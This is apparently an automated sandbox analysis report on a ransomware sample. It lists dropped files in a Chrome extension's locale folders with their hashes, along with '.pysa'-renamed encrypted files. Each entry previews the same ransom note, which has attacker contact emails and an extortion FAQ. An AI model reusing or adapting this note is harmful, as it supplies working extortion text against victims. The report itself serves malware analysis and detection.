                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pa\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\si\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sw\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ta\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\te\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ur\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):69632
                  Entropy (8bit):7.989114112091309
                  Encrypted:false
                  SSDEEP:1536:HQ4el5udAZjHNvJeJC+tQvgDe1/eseSgFEdv7fXPFoI:1elkdeyGvgDelYSgFUv7ftt
                  MD5:5530D73E6845068083FCCE71E3D1D4C6
                  SHA1:6EEBD5797C37C8252A3FED590A31723B3AC266B2
                  SHA-256:1B214889C3EFA74BF0BA66AF6A1DFFFC3C79B786A7E253F08E4CA78F356078F3
                  SHA-512:7AEA7C9C7429C7E983DA5DBE739B9EB97B577A218009F159985763910170EB426FD9CF85198E2E34836F523A4486DDB7FE398281B8AAE7CBF3FC12B7C4018EDF
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\manifest.json.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.049426286448229
                  Encrypted:false
                  SSDEEP:48:0OOSOfevf8+q9nZ0ctVmrsm9i2o27nR7o2E0JcZ1xaXMsgePbLfRYmeaR7:0OO80R9nZYDi2rRGYcZKcWPHfheaR7
                  MD5:8895CF5D4A68F81ECC5D297AEA4D63B9
                  SHA1:470419623DC93A996989135544ED9063CC6B0925
                  SHA-256:BBC78EB2F8524F97387B9CB7DB2252792726360C7C33FF6C79D8221CE25E3252
